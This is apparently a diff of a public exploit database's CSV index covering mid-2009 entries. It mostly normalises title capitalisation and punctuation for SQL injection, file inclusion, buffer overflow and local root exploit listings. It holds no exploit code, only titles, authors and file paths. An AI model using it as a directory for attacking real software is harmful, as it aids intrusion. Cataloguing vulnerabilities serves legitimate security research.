Injection Exploit",2009-07-14,Qabandi,php,webapps,0 9146,platforms/windows/local/9146.pl,"Icarus 2.0 (.ICP File) Local Stack Overflow Exploit",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 (.vib File) Local Stack Overflow PoC",2009-07-14,hack4love,windows,dos,0 -9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z (.mpr) Buffer Overflow Exploit (SEH)",2009-07-14,His0k4,windows,local,0 +9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z - (.mpr) Buffer Overflow Exploit (SEH)",2009-07-14,His0k4,windows,local,0 9149,platforms/windows/local/9149.pl,"Icarus 2.0 (.ICP File) Local Buffer Overflow Exploit (SEH)",2009-07-15,hack4love,windows,local,0 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order <= 2.8 SQL Injection Vulnerability",2009-07-15,"Manh Luat",php,webapps,0 9151,platforms/php/webapps/9151.txt,"ILIAS LMS <= 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns",2009-07-15,YEnH4ckEr,php,webapps,0 @@ -8665,24 +8665,24 @@ id,file,description,date,author,platform,type,port 9182,platforms/php/webapps/9182.txt,"AJOX Poll (managepoll.php) Authentication Bypass Vulnerability",2009-07-17,SirGod,php,webapps,0 9183,platforms/php/webapps/9183.txt,"Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns",2009-07-17,$qL_DoCt0r,php,webapps,0 9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 SITE_fiche.php SQL Injection Vulnerability",2009-07-17,DeCo017,php,webapps,0 -9185,platforms/php/webapps/9185.txt,"Good/Bad Vote (XSS/LFI) Multiple Remote Vulnerabilities",2009-07-17,Moudi,php,webapps,0 +9185,platforms/php/webapps/9185.txt,"good/bad vote (xss/lfi) Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter .m3u file Universal Stack Overflow Exploit",2009-07-17,Stack,windows,local,0 -9187,platforms/php/webapps/9187.txt,"Joomla Component Jobline <= 1.3.1 Blind SQL Injection Vulnerability",2009-07-17,ManhLuat93,php,webapps,0 +9187,platforms/php/webapps/9187.txt,"Joomla Component Jobline <= 1.3.1 - Blind SQL Injection Vulnerability",2009-07-17,ManhLuat93,php,webapps,0 9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 (skin) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9190,platforms/windows/local/9190.pl,"htmldoc 1.8.27.1 (.html) Universal Stack Overflow Exploit",2009-07-17,ksa04,windows,local,0 9191,platforms/linux/local/9191.txt,"Linux 2.6.30+/SELinux/RHEL5 Test Kernel Local Root Exploit 0day",2009-07-17,spender,linux,local,0 9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9193,platforms/php/webapps/9193.pl,"WebVision 2.1 (news.php n) Remote SQL Injection Exploit",2009-07-17,Mr.tro0oqy,php,webapps,0 -9194,platforms/php/webapps/9194.txt,"RadBIDS GOLD 4.0 - Multiple Remote Vulnerabilities",2009-07-17,Moudi,php,webapps,0 -9195,platforms/php/webapps/9195.txt,"RadLance Gold 7.5 Multiple Remote Vulnerabilities",2009-07-17,Moudi,php,webapps,0 -9196,platforms/php/webapps/9196.txt,"RadNICS Gold 5.0 - Multiple Remote Vulnerabilities",2009-07-17,Moudi,php,webapps,0 +9194,platforms/php/webapps/9194.txt,"radbids gold 4.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 +9195,platforms/php/webapps/9195.txt,"radlance gold 7.5 Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 +9196,platforms/php/webapps/9196.txt,"radnics gold 5.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 9199,platforms/windows/local/9199.txt,"Adobe related service (getPlus_HelperSvc.exe) Local Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 (.mpl/.m3u) Local Heap Overflow PoC",2009-07-20,hack4love,windows,dos,0 9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln",2009-07-20,Bgh7,php,webapps,0 9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 Authentication Bypass Vulnerability",2009-07-20,Mr.tro0oqy,php,webapps,0 9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0 -9205,platforms/php/webapps/9205.txt,"MCshoutbox 1.1 (SQL/XSS/Shell) Multiple Remote Vulnerabilities",2009-07-20,SirGod,php,webapps,0 +9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 (sql/xss/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0 9207,platforms/windows/local/9207.sh,"PulseAudio setuid Local Privilege Escalation Exploit",2009-07-20,n/a,windows,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)",2009-07-20,n/a,linux,local,0 @@ -8701,7 +8701,7 @@ id,file,description,date,author,platform,type,port 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0 9224,platforms/windows/remote/9224.py,"MS Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection Vulnerability",2009-07-21,n3w7u,php,webapps,0 -9226,platforms/php/webapps/9226.txt,"phpDirectorySource (XSS/SQL) Multiple Remote Vulnerabilities",2009-07-21,Moudi,php,webapps,0 +9226,platforms/php/webapps/9226.txt,"phpdirectorysource (xss/sql) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script (url) Local File Disclosure Vulnerability",2009-07-21,Moudi,php,webapps,0 9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 (.ofl File) Local Heap Overflow PoC",2009-07-22,hack4love,windows,dos,0 9229,platforms/windows/local/9229.py,"WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH) #2",2009-07-22,Dz_Girl,windows,local,0 @@ -8731,14 +8731,14 @@ id,file,description,date,author,platform,type,port 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln",2009-07-24,Qabandi,php,webapps,0 9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 (file) Remote File Disclosure Exploit",2009-07-24,Qabandi,php,webapps,0 9258,platforms/php/webapps/9258.txt,"Joomla Almond Classifieds 7.5 (com_aclassf) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9259,platforms/php/webapps/9259.txt,"Almond Classifieds Ads (bSQL/XSS) Multiple Remote Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9260,platforms/php/webapps/9260.txt,"SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9261,platforms/php/webapps/9261.txt,"XOOPS Celepar Module Qas (bSQL/XSS) Multiple Remote Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9262,platforms/php/webapps/9262.txt,"GarageSalesJunkie (SQL/XSS) Multiple Remote Vulnerabilities",2009-07-27,Moudi,php,webapps,0 +9259,platforms/php/webapps/9259.txt,"almond classifieds ads (bsql/xss) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 +9260,platforms/php/webapps/9260.txt,"skadate dating (rfi/lfi/xss) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 +9261,platforms/php/webapps/9261.txt,"xoops celepar module qas (bsql/xss) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 +9262,platforms/php/webapps/9262.txt,"garagesalesjunkie (sql/xss) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9263,platforms/php/webapps/9263.txt,"URA 3.0 (cat) remote SQL injection Vulnerability",2009-07-27,"Chip D3 Bi0s",php,webapps,0 9264,platforms/linux/dos/9264.py,"stftp <= 1.10 (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0 -9266,platforms/php/webapps/9266.txt,"iWiccle 1.01 (LFI/SQL) Multiple Remote Vulnerabilities",2009-07-27,SirGod,php,webapps,0 +9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 (lfi/sql) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)",2009-07-27,octopos,php,webapps,0 9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0 @@ -8746,7 +8746,7 @@ id,file,description,date,author,platform,type,port 9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL injection Vulnerability",2009-07-27,boom3rang,php,webapps,0 9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (py)",2009-07-27,Dr_IDE,windows,local,0 9273,platforms/php/webapps/9273.php,"Allomani Mobile 2.5 Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 -9274,platforms/php/webapps/9274.php,"Allomani Songs & Clips 2.7.0 Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 +9274,platforms/php/webapps/9274.php,"Allomani Songs & Clips 2.7.0 - Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 9275,platforms/php/webapps/9275.php,"Allomani Movies & Clips 2.7.0 Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 9276,platforms/php/webapps/9276.txt,"IXXO Cart! Standalone and Joomla Component SQL Injection Vuln",2009-07-27,sm0k3,php,webapps,0 9277,platforms/windows/dos/9277.pl,"MP3 Studio 1.0 (.mpf /.m3u File) Local Stack Overflow PoC",2009-07-27,hack4love,windows,dos,0 @@ -8760,7 +8760,7 @@ id,file,description,date,author,platform,type,port 9286,platforms/windows/local/9286.pl,"MP3 Studio 1.0 (.mpf /.m3u File) Local Stack Overflow Exploit (SEH)",2009-07-28,corelanc0d3r,windows,local,0 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script (paidbanner.php ID) SQL Injection Vulnerability",2009-07-28,"ThE g0bL!N",php,webapps,0 9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 (linkout.php id) SQL Injection Vulnerability",2009-07-28,MizoZ,php,webapps,0 -9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod <= 2.0.4 Blind SQL Injection Exploit",2009-07-28,Dante90,php,webapps,0 +9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod <= 2.0.4 - Blind SQL Injection Exploit",2009-07-28,Dante90,php,webapps,0 9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 Arbitrary Shell Upload Vulnerability",2009-07-28,Mr.tro0oqy,php,webapps,0 9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - (.mpf) Local BOF Exploit (SEH)",2009-07-28,Koshi,windows,local,0 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0 @@ -8768,7 +8768,7 @@ id,file,description,date,author,platform,type,port 9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0 9295,platforms/windows/dos/9295.txt,"Firebird SQL op_connect_request main listener shutdown Vulnerability",2009-07-28,"Core Security",windows,dos,0 9296,platforms/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps,0 -9297,platforms/php/webapps/9297.txt,"Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability",2009-07-28,NoGe,php,webapps,0 +9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion Vulnerability",2009-07-28,NoGe,php,webapps,0 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit (update)",2009-07-30,corelanc0d3r,windows,local,0 9299,platforms/windows/local/9299.pl,"WINMOD 1.4 (.lst) Local Stack Overflow Exploit XP SP3 (RET+SEH) #3",2009-07-28,corelanc0d3r,windows,local,0 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC",2009-07-30,Kingcope,multiple,dos,0 @@ -8780,10 +8780,10 @@ id,file,description,date,author,platform,type,port 9306,platforms/aix/local/9306.txt,"IBM AIX 5.3 libc MALLOCDEBUG File Overwrite Vulnerability",2009-07-30,Affix,aix,local,0 9307,platforms/php/webapps/9307.txt,"Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability",2009-07-30,GoLd_M,php,webapps,0 9308,platforms/php/webapps/9308.txt,"justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities",2009-07-30,SirGod,php,webapps,0 -9309,platforms/php/webapps/9309.txt,"Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities",2009-07-30,SirGod,php,webapps,0 +9309,platforms/php/webapps/9309.txt,"orbis cms 1.0 (afd/adf/asu/sql) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities",2009-07-30,SirGod,php,webapps,0 -9311,platforms/php/webapps/9311.txt,"CMSphp 0.21 (LFI/XSS) Multiple Remote Vulnerabilities",2009-07-30,SirGod,php,webapps,0 -9312,platforms/php/webapps/9312.txt,"d.net CMS (LFI/SQLI) Multiple Remote Vulnerabilities",2009-07-30,SirGod,php,webapps,0 +9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 (lfi/xss) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 +9312,platforms/php/webapps/9312.txt,"d.net cms (lfi/sqli) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a (pagecontent.php PT) Local File Inclusion Vulnerability",2009-07-30,SirGod,php,webapps,0 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod <= 2.0.4 Local File Inclusion Exploit",2009-07-30,Dante90,php,webapps,0 @@ -8798,7 +8798,7 @@ id,file,description,date,author,platform,type,port 9324,platforms/php/webapps/9324.txt,"Joomla Component com_jfusion (Itemid) Blind SQL Injection Vuln",2009-08-01,"Chip D3 Bi0s",php,webapps,0 9325,platforms/php/webapps/9325.txt,"PortalXP - Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities",2009-08-01,SirGod,php,webapps,0 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites",2009-08-01,SirGod,php,webapps,0 -9327,platforms/php/webapps/9327.txt,"Mobilelib Gold 3.0 - (Auth Bypass/SQL) Multiple Remote Vulnerabilities",2009-08-01,SwEET-DeViL,php,webapps,0 +9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - (auth bypass/sql) Multiple Vulnerabilities",2009-08-01,SwEET-DeViL,php,webapps,0 9328,platforms/asp/webapps/9328.txt,"AW BannerAd (Auth Bypass) SQL Injection Vulnerability",2009-08-03,Ro0T-MaFia,asp,webapps,0 9329,platforms/windows/local/9329.pl,"BlazeDVD 5.1 Professional (.PLF File) Local Buffer Overflow Exploit (SEH)",2009-08-03,hack4love,windows,local,0 9330,platforms/windows/remote/9330.py,"Amaya 11.2 W3C Editor/Browser (defer) Remote BOF Exploit (SEH)",2009-08-03,His0k4,windows,remote,0 @@ -8811,9 +8811,9 @@ id,file,description,date,author,platform,type,port 9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 (files.php) Authentication Bypass Vulnerability",2009-08-03,SirGod,php,webapps,0 9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 -9340,platforms/php/webapps/9340.txt,"x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities",2009-08-03,Moudi,php,webapps,0 +9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 (Auth Bypass) Remote SQL Injection Vuln",2009-08-03,Snakespc,php,webapps,0 -9342,platforms/php/webapps/9342.txt,"Elvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities",2009-08-03,"599eme Man",php,webapps,0 +9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 (sql/xss) Multiple Vulnerabilities",2009-08-03,"599eme Man",php,webapps,0 9343,platforms/windows/local/9343.pl,"MediaCoder 0.6.2.4275 (.lst File) Stack Buffer Overflow Exploit",2009-08-03,SkuLL-HacKeR,windows,local,0 9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 (index php action) SQL Injection Vulnerability",2009-08-03,sarbot511,php,webapps,0 9345,platforms/windows/dos/9345.pl,"RadASM 2.2.1.5 (.mnu File) Local Format String PoC",2009-08-03,SkuLL-HacKeR,windows,dos,0 @@ -8827,7 +8827,7 @@ id,file,description,date,author,platform,type,port 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability",2009-08-04,SirGod,php,webapps,0 9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0 9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability",2009-08-04,eLwaux,php,webapps,0 -9356,platforms/php/webapps/9356.txt,"Shopmaker CMS 2.0 (bSQL/ LFI) Multiple Remote Vulnerabilities",2009-08-04,Platen,php,webapps,0 +9356,platforms/php/webapps/9356.txt,"shopmaker cms 2.0 (bsql/ lfi) Multiple Vulnerabilities",2009-08-04,Platen,php,webapps,0 9357,platforms/cgi/webapps/9357.txt,"Perl$hop e-commerce Script Trust Boundary Input Parameter Injection",2009-08-04,shadow,cgi,webapps,0 9358,platforms/php/webapps/9358.txt,"In-Portal 4.3.1 (index.php env) Local File Inclusion Vulnerability",2009-08-04,"Angela Chang",php,webapps,0 9359,platforms/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx (.m3u) Local Buffer Overflow PoC",2009-08-04,hack4love,windows,dos,0 @@ -8836,13 +8836,13 @@ id,file,description,date,author,platform,type,port 9362,platforms/windows/dos/9362.html,"MS Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC",2009-08-05,schnuddelbuddel,windows,dos,0 9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0 9364,platforms/windows/local/9364.py,"Tuniac v.090517c (.M3U File) Local File Crash PoC",2009-08-05,Dr_IDE,windows,local,0 -9365,platforms/php/webapps/9365.txt,"MyBackup 1.4.0 (AFD/RFI) Multiple Remote Vulnerabilities",2009-08-05,SirGod,php,webapps,0 -9366,platforms/windows/local/9366.pl,"jetAudio v 7.1.9.4030 plus vx (.m3u) Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local,0 -9367,platforms/php/webapps/9367.txt,"Tenrok 1.1.0 (UDD/RCE) Multiple Remote Vulnerabilities",2009-08-05,SirGod,php,webapps,0 +9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 (afd/rfi) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 +9366,platforms/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - (.m3u) Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local,0 +9367,platforms/php/webapps/9367.txt,"tenrok 1.1.0 (udd/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9368,platforms/windows/dos/9368.pl,"UltraPlayer Media Player 2.112 Local Buffer Overflow PoC",2009-08-05,sarbot511,windows,dos,0 9369,platforms/php/webapps/9369.txt,"Irokez CMS 0.7.1 Remote SQL Injection Vulnerability",2009-08-05,Ins3t,php,webapps,0 9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 (bSQL-XSS) Multiple Vulns",2009-08-05,Moudi,php,webapps,0 -9371,platforms/php/webapps/9371.txt,"OpenNews 1.0 (SQLI/RCE) Multiple Remote Vulnerabilities",2009-08-05,SirGod,php,webapps,0 +9371,platforms/php/webapps/9371.txt,"opennews 1.0 (sqli/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9372,platforms/php/webapps/9372.txt,"Portel 2008 - (decide.php patron) Blind SQL Injection Vulnerability",2009-08-05,"Chip D3 Bi0s",php,webapps,0 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE SCTP Local Kernel Denial of Service Exploit",2009-08-06,"Shaun Colley",freebsd,dos,0 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0 @@ -8868,7 +8868,7 @@ id,file,description,date,author,platform,type,port 9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 (RFI/LFI/XSS) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0 9398,platforms/php/webapps/9398.php,"Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit",2009-08-07,M4dhead,php,webapps,0 9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-08-07,Dns-Team,php,webapps,0 -9400,platforms/php/webapps/9400.txt,"Logoshows BBS 2.0 (DD/ICH) Multiple Remote Vulnerabilities",2009-08-07,ZoRLu,php,webapps,0 +9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 (dd/ich) Multiple Vulnerabilities",2009-08-07,ZoRLu,php,webapps,0 9401,platforms/windows/dos/9401.py,"Spiceworks 3.6 Accept Parameter Overflow Crash Exploit",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 9404,platforms/php/webapps/9404.txt,"SmilieScript <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-08-10,Mr.tro0oqy,php,webapps,0 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 Authenticated Arbitrary Code Execution Vulnerability",2009-08-10,"RedTeam Pentesting",php,webapps,0 @@ -8898,7 +8898,7 @@ id,file,description,date,author,platform,type,port 9431,platforms/php/webapps/9431.txt,"Wordpress Plugin WP-Syntax <= 0.9.1 Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 (user.ini) Arbitrary Download Vulnerability",2009-08-13,"aBo MoHaMeD",hardware,remote,0 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 -9434,platforms/php/webapps/9434.txt,"TGS CMS 0.x (XSS/SQL/FD) Multiple Remote Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 +9434,platforms/php/webapps/9434.txt,"tgs cms 0.x (xss/sql/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit",2009-08-14,spender,linux,local,0 9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x sock_sendpage() Local Root Exploit #2",2009-08-14,"Przemyslaw Frasunek",linux,local,0 9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,IRCRASH,php,webapps,0 @@ -8923,7 +8923,7 @@ id,file,description,date,author,platform,type,port 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 (.xpl) Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway (Auth Bypass & Password Reset) Vulnerabilities #2",2009-08-18,bugz,php,webapps,0 -9460,platforms/php/webapps/9460.txt,"Autonomous LAN party <= 0.98.3 Remote File Inclusion Vulnerability",2009-08-18,cr4wl3r,php,webapps,0 +9460,platforms/php/webapps/9460.txt,"autonomous lan party <= 0.98.3 - Remote File Inclusion Vulnerability",2009-08-18,cr4wl3r,php,webapps,0 9461,platforms/php/webapps/9461.txt,"E Cms <= 1.0 (index.php s) Remote SQL Injection Vulnerability",2009-08-18,Red-D3v1L,php,webapps,0 9462,platforms/php/webapps/9462.txt,"Infinity <= 2.x.x options[style_dir] Local File Disclosure Vulnerability",2009-08-18,SwEET-DeViL,php,webapps,0 9463,platforms/php/webapps/9463.php,"Joomla Component MisterEstate Blind SQL Injection Exploit",2009-08-18,jdc,php,webapps,0 @@ -8987,12 +8987,12 @@ id,file,description,date,author,platform,type,port 9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0 9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 Multiple Remote File Inclusion Vulnerabilities",2009-08-26,cr4wl3r,php,webapps,0 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0 -9524,platforms/php/webapps/9524.txt,"TotalCalendar 2.4 (bSQL/LFI) Multiple Remote Vulnerabilities",2009-08-26,Moudi,php,webapps,0 +9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0 9525,platforms/php/webapps/9525.txt,"Moa Gallery <= 1.2.0 (p_filename) Remote File Disclosure Vulnerability",2009-08-26,GoLd_M,php,webapps,0 9527,platforms/php/webapps/9527.txt,"Simple CMS FrameWork <= 1.0 (page) Remote SQL Injection Vuln",2009-08-26,Red-D3v1L,php,webapps,0 9528,platforms/windows/dos/9528.py,"TFTPUtil GUI 1.3.0 Remote Denial of Service Exploit",2009-08-26,"ThE g0bL!N",windows,dos,0 9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star <= 2.0 (fmid) SQL Injection Vulnerability",2009-08-26,ZhaoHuAn,php,webapps,0 -9530,platforms/php/webapps/9530.txt,"Open Auto Classifieds <= 1.5.9 Multiple Remote Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 +9530,platforms/php/webapps/9530.txt,"open auto classifieds <= 1.5.9 Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 (list.php string) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0 9532,platforms/php/webapps/9532.txt,"allomani 2007 (cat) Remote SQL Injection Vulnerability",2009-08-26,"NeX HaCkeR",php,webapps,0 9533,platforms/php/webapps/9533.txt,"phpSANE 0.5.0 (save.php) Remote File Inclusion Vulnerability",2009-08-26,CoBRa_21,php,webapps,0 @@ -9062,7 +9062,7 @@ id,file,description,date,author,platform,type,port 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0 9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 (fonctions_racine.php) Remote File Inclusion Vuln",2009-09-09,"EA Ngel",php,webapps,0 9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0 -9602,platforms/php/webapps/9602.pl,"Joomla Component TPDugg 1.1 Blind SQL Injection Exploit",2009-09-09,NoGe,php,webapps,0 +9602,platforms/php/webapps/9602.pl,"Joomla Component TPDugg 1.1 - Blind SQL Injection Exploit",2009-09-09,NoGe,php,webapps,0 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro (user_id) SQL Injection Vulnerability",2009-09-09,R3d-D3v!L,php,webapps,0 9604,platforms/php/webapps/9604.txt,"Joomla 